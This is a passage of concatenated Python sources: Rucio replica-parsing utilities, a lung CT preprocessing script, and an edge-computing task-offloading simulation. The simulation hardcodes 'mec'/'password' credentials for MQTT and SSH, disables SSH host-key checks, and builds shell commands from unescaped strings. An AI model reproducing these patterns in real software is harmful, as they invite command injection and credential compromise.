raise ValueError('Length has to be an integer value.')
filters[key] = value
else:
if value.lower() == 'true':
value = '1'
elif value.lower() == 'false':
value = '0'
filters[key] = value
return filters, type
def parse_replicas_from_file(path):
"""
Parses the output of list_replicas from a json or metalink file
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param path: the path to the input file
:returns: a list with a dictionary for each file
"""
with open(path) as fp:
try:
root = ElementTree.parse(fp).getroot()
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.load(fp)
except ValueError as json_err:
raise MetalinkJsonParsingError(path, xml_err, json_err)
def parse_replicas_from_string(string):
"""
Parses the output of list_replicas from a json or metalink string
into a dictionary. Metalink parsing is tried first and if it fails
it tries to parse json.
:param string: the string to parse
:returns: a list with a dictionary for each file
"""
try:
root = ElementTree.fromstring(string)
return parse_replicas_metalink(root)
except ElementTree.ParseError as xml_err:
try:
return json.loads(string)
except ValueError as json_err:
raise MetalinkJsonParsingError(string, xml_err, json_err)
def parse_replicas_metalink(root):
"""
Transforms the metalink tree into a list of dictionaries where
each dictionary describes a file with its replicas.
Will be called by parse_replicas_from_file and parse_replicas_from_string.
:param root: root node of the metalink tree
:returns: a list with a dictionary for each file
"""
files = []
# metalink namespace
ns = '{urn:ietf:params:xml:ns:metalink}'
str_to_bool = {'true': True, 'True': True, 'false': False, 'False': False}
# loop over all <file> tags of the metalink string
for file_tag_obj in root.findall(ns + 'file'):
# search for identity-tag
identity_tag_obj = file_tag_obj.find(ns + 'identity')
if not ElementTree.iselement(identity_tag_obj):
raise InputValidationError('Failed to locate identity-tag inside %s' % ElementTree.tostring(file_tag_obj))
cur_file = {'did': identity_tag_obj.text,
'adler32': None,
'md5': None,
'sources': []}
parent_dids = set()
parent_dids_tag_obj = file_tag_obj.find(ns + 'parents')
if ElementTree.iselement(parent_dids_tag_obj):
for did_tag_obj in parent_dids_tag_obj.findall(ns + 'did'):
parent_dids.add(did_tag_obj.text)
cur_file['parent_dids'] = parent_dids
size_tag_obj = file_tag_obj.find(ns + 'size')
cur_file['bytes'] = int(size_tag_obj.text) if ElementTree.iselement(size_tag_obj) else None
for hash_tag_obj in file_tag_obj.findall(ns + 'hash'):
hash_type = hash_tag_obj.get('type')
if hash_type:
cur_file[hash_type] = hash_tag_obj.text
for url_tag_obj in file_tag_obj.findall(ns + 'url'):
key_rename_map = {'location': 'rse'}
src = {}
for k, v in url_tag_obj.items():
k = key_rename_map.get(k, k)
src[k] = str_to_bool.get(v, v)
src['pfn'] = url_tag_obj.text
cur_file['sources'].append(src)
files.append(cur_file)
return files
def get_thread_with_periodic_running_function(interval, action, graceful_stop):
"""
Get a thread where a function runs periodically.
:param interval: Interval in seconds when the action fucntion should run.
:param action: Function, that should run periodically.
:param graceful_stop: Threading event used to check for graceful stop.
"""
def start():
while not graceful_stop.is_set():
starttime = time.time()
action()
time.sleep(interval - ((time.time() - starttime)))
t = threading.Thread(target=start)
return t
def run_cmd_process(cmd, timeout=3600):
"""
shell command parser with timeout
:param cmd: shell command as a string
:param timeout: in seconds
:return: stdout xor stderr, and errorcode
"""
time_start = datetime.datetime.now().second
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, preexec_fn=os.setsid)
running_time = 0
while process.poll() is None and running_time < timeout:
time_now = datetime.datetime.now().second
running_time = int(time_now - time_start)
time.sleep(3)
if process.poll() is None:
process.terminate()
time.sleep(3)
if process.poll() is None:
process.kill()
stdout, stderr = process.communicate()
if not stderr:
stderr = ''
if not stdout:
stdout = ''
if stderr and stderr != '':
stdout += " Error: " + stderr
if process:
returncode = process.returncode
else:
returncode = 1
if returncode != 1 and 'Command time-out' in stdout:
returncode = 1
if returncode is None:
returncode = 0
return returncode, stdout
def api_update_return_dict(dictionary):
"""
Ensure that rse is in a dictionary returned from core
:param dictionary: The dictionary to edit
:returns dictionary: The edited dictionary
"""
if not isinstance(dictionary, dict):
return dictionary
copied = False # Avoid side effects from pass by object
if 'rse_id' in dictionary.keys():
if 'rse' not in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
import rucio.core.rse
dictionary['rse'] = rucio.core.rse.get_rse_name(rse_id=dictionary['rse_id'])
# if 'vo' not in dictionary.keys():
# if not copied:
# dictionary = dictionary.copy()
# copied = True
# import rucio.core.rse
# dictionary['vo'] = rucio.core.rse.get_rse_vo(rse_id=dictionary['rse_id'])
if 'account' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
# dictionary['vo'] = dictionary['account'].vo
dictionary['account'] = dictionary['account'].external
if 'scope' in dictionary.keys():
if not copied:
dictionary = dictionary.copy()
copied = True
# dictionary['vo'] = dictionary['scope'].vo
dictionary['scope'] = dictionary['scope'].external
return dictionary
|
preprocess_new_lung_data.py
|
import h5py
import SimpleITK as sitk
import os, sys
sys.path.insert(0,os.path.abspath('..'))
sys.path.insert(0,os.path.abspath('.'))
sys.path.insert(0,os.path.abspath('../easyreg'))
import numpy as np
import glob
from easyreg.reg_data_utils import write_list_into_txt
from tools.image_rescale import resize_input_img_and_save_it_as_tmp
from multiprocessing import Process
output_path = "/playpen-raid1/Data/Lung_Registration_clamp_normal"
os.makedirs(output_path,exist_ok=True)
#['Expiration_CT', 'Expiration_CT.key', 'Expiration_CT.missing',
# 'Expiration_CT.origin', 'Expiration_CT.spacing', 'Expiration_labelmap',
# 'Expiration_labelmap.key', 'Expiration_labelmap.missing', 'Expiration_labelmap.origin',
# 'Expiration_labelmap.spacing', 'Inspiration_CT', 'Inspiration_CT.key',
# 'Inspiration_CT.missing', 'Inspiration_CT.origin', 'Inspiration_CT.spacing',
# 'Inspiration_labelmap', 'Inspiration_labelmap.key', 'Inspiration_labelmap.missing',
# 'Inspiration_labelmap.origin', 'Inspiration_labelmap.spacing', 'Inspiration_local_histogram_lm',
# 'Inspiration_local_histogram_lm.key', 'Inspiration_local_histogram_lm.missing',
# 'Inspiration_local_histogram_lm.origin', 'Inspiration_local_histogram_lm.spacing']
def normalize_intensity(img, linear_clip=False):
"""
a numpy image, normalize into intensity [-1,1]
(img-img.min())/(img.max() - img.min())
:param img: image
:param linear_clip: Linearly normalized image intensities so that the 95-th percentile gets mapped to 0.95; 0 stays 0
:return:
"""
if linear_clip:
img = img - img.min()
normalized_img = img / np.percentile(img, 95) * 0.95
else:
min_intensity = img.min()
max_intensity = img.max()
normalized_img = (img - img.min()) / (max_intensity - min_intensity)
return normalized_img
def process_image(img, fname, is_label=False):
"""
:param img: numpy image
:return:
"""
if not is_label:
img[img<-1000] = -1000
img[img>1000] = 1000
img = normalize_intensity(img)
else:
img[img != 0] = 1
# img[img==2]=1
# img[img==3]=2
# assert list(np.unique(img))==[0,1,2],"the fname {} has label {} with label 3 density{}".format(fname,list(np.unique(img)),np.sum(img==3))
return img
def process_lung_data(index_list):
h5_path = "/playpen-raid1/Data/UNC_Registration.h5"
f = h5py.File(h5_path, 'r')
modaility = ['Expiration_CT','Expiration_labelmap','Inspiration_CT','Inspiration_labelmap','Inspiration_local_histogram_lm']
mod_suffix = ['_img','_label','_img','_label','_hist']
is_label = [False, True, False, True, None]
for ind,mod in enumerate(modaility):
atr_key = mod+'.key'
atr_origin = mod + '.origin'
atr_spacing = mod + '.spacing'
for i in index_list:
img = f[mod][i]
img = process_image(img,f[atr_key][i][1],is_label[ind]) if is_label[ind] is not None else img
folder_name = f[atr_key][i][0]
fname = f[atr_key][i][1]
origin = f[atr_origin][i].astype(np.float64)
spacing = f[atr_spacing][i].astype(np.float64)
sitk_img = sitk.GetImageFromArray(img)
sitk_img.SetOrigin(origin)
sitk_img.SetSpacing(spacing)
output_folder = os.path.join(output_path,folder_name)
os.makedirs(output_folder,exist_ok=True)
sitk.WriteImage(sitk_img,os.path.join(output_folder, fname+mod_suffix[ind]+".nii.gz"))
def get_input_file(refer_folder, output_txt):
source_image_path_list = glob.glob(os.path.join(refer_folder,"**","*EXP*img*"))
source_label_path_list = [path.replace("_img.nii.gz","_label.nii.gz") for path in source_image_path_list]
target_image_path_list = [path.replace("_EXP_","_INSP_") for path in source_image_path_list]
target_label_path_list = [path.replace("_img.nii.gz","_label.nii.gz") for path in target_image_path_list]
num_file = len(source_image_path_list)
file_list = [[source_image_path_list[i], target_image_path_list[i], source_label_path_list[i], target_label_path_list[i]] for i in
range(num_file)]
write_list_into_txt(output_txt,file_list)
num_of_workers=20
split_index = np.array_split(np.array(range(999)), num_of_workers)
procs = []
for i in range(num_of_workers):
p = Process(target=process_lung_data, args=(split_index[i],))
p.start()
print("pid:{} start:".format(p.pid))
procs.append(p)
for p in procs:
p.join()
#
# output_path = "/playpen-raid1/zyshen/data/lung_new_reg"
# os.makedirs(output_path,exist_ok=True)
# output_txt = os.path.join(output_path,"pair_path_list.txt")
# get_input_file(output_path,output_txt)
|
algo_three.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def ping(host):
cmd = [f'ping -c 1 {host}']
output = str(sp.check_output(cmd, shell=True), 'utf-8').split('\n')
try:
value = float(output[-2].split('=')[-1].split('/')[0])
except ValueError:
value = None
return value
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(my_algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
global run
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time() + ['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
elif data.strip() == 'stop': # stop {hostname: ip}
print('sending stop alert')
run = 0
def connect_to_broker(stop):
global _client
username = 'mec'
password = 'password'
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_start()
while True:
if stop():
_client.loop_stop()
_client.disconnect()
print('broker loop terminated')
break
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]] / 2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(stop): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop():
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0, 0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(stop): # run as a thread
global _inward_mec
global t_track
while True:
if stop():
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time() + ['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*' * 30 + f'\n{da[1]} Not in Task Record\n' + '*' * 30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload(stop):
global reoffload_list, outward_mec
global offload_check
while True:
if stop():
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg, send_path):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound-wait {} {}'.format(get_hostname(), send_path)
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_send(send_path):
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received{_id_}_7_{mec_no} = {total_received_task} \nsent_t{_id_}_7_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
file_.write(i)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_7_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:{send_path}"])
send_result(hosts['osboxes-0'], list_result)
send_email(result, send_path)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time() + [task_record[_task_]]}), )
def terminate_process():
global prev_t, _loc, _off_mec, _off_cloud, _inward_mec, outward_mec, deadlock, memory, mec_waiting_time, mec_rtt
global offload_register, reoffload_list, discovering, test, _time, _pos, received_task_queue, received_time
global cloud_register, t_track, task_record, task_id, cooperate, clients_record, offload_check
global timed_out_tasks, total_received_task, _cpu
# reinitialize #
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
